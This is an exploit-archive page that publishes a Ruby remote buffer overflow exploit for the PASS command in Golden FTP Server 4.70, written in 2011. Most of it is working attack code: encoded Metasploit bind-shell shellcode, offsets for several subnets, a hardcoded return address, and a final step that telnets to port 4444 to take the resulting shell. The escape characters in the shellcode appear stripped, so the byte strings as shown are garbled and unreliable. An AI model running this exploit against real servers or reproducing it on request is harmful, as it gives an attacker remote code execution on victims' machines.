Golden FTP Server v4.70 PASS Command Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Golden FTP Server v4.70 PASS Command Buffer Overflow Exploit
# Published : 2011-01-23
# Author : cd1zz and iglesiasgg
# Previous Title : MS11-002: Microsoft Data Access Components Vulnerability
# Next Title : Novell iPrint <= 5.52 ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)

#GoldenFTP 4.70 PASS Exploit
#Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
#Tested on XP SP3 
#Vendor Contacted: 1/17/2011 (no response)
#For this exploit to work correctly, you need to know the subnet that the server 
#is running on. You also need to make sure that "show new connections" is checked in the options.
#The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.
#528 is the offset when server running on 192.168.236.0 
#533 is the offset when server running on 10.0.1.0 
#530 is the offset when server running on 192.168.1.0 
#531 is the offset when server running on 172.16.1.0 

require 'net/ftp'

#Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes
shellcode = ("x2bxc9xb1x56xbax96x70x11x9exdbxd0xd9x74x24" +
"xf4x58x31x50x10x03x50x10x83xe8xfcx74x85xed" +
"x76xf1x66x0ex87x61xeexebxb6xb3x94x78xeax03" +
"xdex2dx07xe8xb2xc5x9cx9cx1axe9x15x2ax7dxc4" +
"xa6x9bx41x8ax65xbax3dxd1xb9x1cx7fx1axccx5d" +
"xb8x47x3fx0fx11x03x92xbfx16x51x2fxbexf8xdd" +
"x0fxb8x7dx21xfbx72x7fx72x54x09x37x6axdex55" +
"xe8x8bx33x86xd4xc2x38x7cxaexd4xe8x4dx4fxe7" +
"xd4x01x6exc7xd8x58xb6xe0x02x2fxccx12xbex37" +
"x17x68x64xb2x8axcaxefx64x6fxeax3cxf2xe4xe0" +
"x89x71xa2xe4x0cx56xd8x11x84x59x0fx90xdex7d" +
"x8bxf8x85x1cx8axa4x68x21xccx01xd4x87x86xa0" +
"x01xb1xc4xacxe6x8fxf6x2cx61x98x85x1ex2ex32" +
"x02x13xa7x9cxd5x54x92x58x49xabx1dx98x43x68" +
"x49xc8xfbx59xf2x83xfbx66x27x03xacxc8x98xe3" +
"x1cxa9x48x8bx76x26xb6xabx78xecxc1xecxb6xd4" +
"x81x9axbaxeax34x06x32x0cx5cxa6x12x86xc9x04" +
"x41x1fx6dx77xa3x33x26xefxfbx5dxf0x10xfcx4b" +
"x52xbdx54x1cx21xadx60x3dx36xf8xc0x34x0ex6a" +
"x9ax28xdcx0bx9bx60xb6xa8x0exefx47xa7x32xb8" +
"x10xe0x85xb1xf5x1cxbfx6bxe8xddx59x53xa8x39" +
"x9ax5ax30xccxa6x78x22x08x26xc5x16xc4x71x93" +
"xc0xa2x2bx55xbbx7cx87x3fx2bxf9xebxffx2dx06" +
"x26x76xd1xb6x9fxcfxedx76x48xd8x96x6bxe8x27" +
"x4dx28x18x62xccx18xb1x2bx84x19xdcxcbx72x5d" +
"xd9x4fx77x1dx1ex4fxf2x18x5axd7xeex50xf3xb2" +
"x10xc7xf4x96x1b")

puts "[*]This exploit requires knowledge of the local n[*]subnet the ftp server is running on."
puts "[*]It will not work unless it is one of these: n-->10.0.1.0n-->192.168.1.0n-->172.16.1.0n-->192.168.236.0n[*]If your subnet isn't listed, figure out the offset on your own."
puts "[*]Enter the IP of the GoldenFTP Server"
host = gets.chomp    

#Get the subnet so we can figure out the offset
puts "Which subnet is the FTP server running on?"
puts "1 --> 10.0.1.0" 
puts "2 --> 192.168.1.0" 
puts "3 --> 172.16.1.0" 
puts "4 --> 192.168.236.0" 
subnet = gets.chomp 
                                     
junk = "x01" + "x90" * 19
eip = "x4exaex45x7e"

padto529 = "x90" * 136
padto527 = "x90" * 134
padto526 = "x90" * 133
padto524 = "x90" * 131
 
if subnet =="1"
	buffer = junk + shellcode + padto529 + eip # buffer is 529 total bytes
elsif subnet =="2"
	buffer = junk + shellcode + padto526 + eip # buffer is 526 total bytes
elsif subnet =="3"
	buffer = junk + shellcode + padto527 + eip # buffer is 527 total bytes
elsif subnet =="4"
	buffer = junk + shellcode + padto524 + eip # buffer is 524 total bytes
end

ftp = Net::FTP.new(host)
 
puts "++ Connecting to target...n"
 
ftp.login(user="anonymous", passwd=(buffer))                       
ftp.passive = true

sleep(2)
 
ftp.close

puts "++ Connecting to target on port 4444....n"
sleep(2)

command= "telnet "+ host +" 4444"
 
system(command)